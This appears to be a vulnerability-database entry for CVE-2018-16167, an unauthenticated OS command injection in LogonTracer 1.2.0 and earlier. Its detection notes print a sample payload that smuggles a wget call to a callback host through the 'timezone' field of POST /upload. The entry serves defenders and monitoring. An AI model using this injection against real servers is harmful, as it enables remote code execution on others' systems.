cbcvebase.
CVE-2018-16167
published 2019-01-09

CVE-2018-16167: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.

PriorityP190critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
74.74%
99.4th percentile
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.

Affected

2 ranges
VendorProductVersion rangeFixed in
jpcertlogontracer<= 1.2.0
jpcert_coordination_centerlogontracer

Detection & IOCsextracted from sources · hover to see the quote

url/upload
path/upload
sigma
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
  • Exploit targets the POST /upload endpoint with a crafted 'timezone' parameter containing a semicolon-delimited OS command injection payload (e.g., '1;<command>;'). Monitor for POST requests to /upload with semicolons in the timezone field.
  • The injection is delivered via application/x-www-form-urlencoded POST body to /upload. The timezone parameter value begins with '1;' followed by the injected command and a trailing semicolon.
  • No authentication is required to exploit this vulnerability. Any unauthenticated POST to /upload with a malicious timezone value should be treated as an attack attempt.
  • ·The vulnerable parameter is 'timezone' in the POST body to /upload. The injection delimiter is a semicolon (;), allowing arbitrary OS command chaining after the numeric value (e.g., '1;<cmd>;'). This applies to LogonTracer 1.2.0 and earlier.
  • ·The logtype field is set to 'XML' in the exploit; this may be required for the vulnerable code path to be reached.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.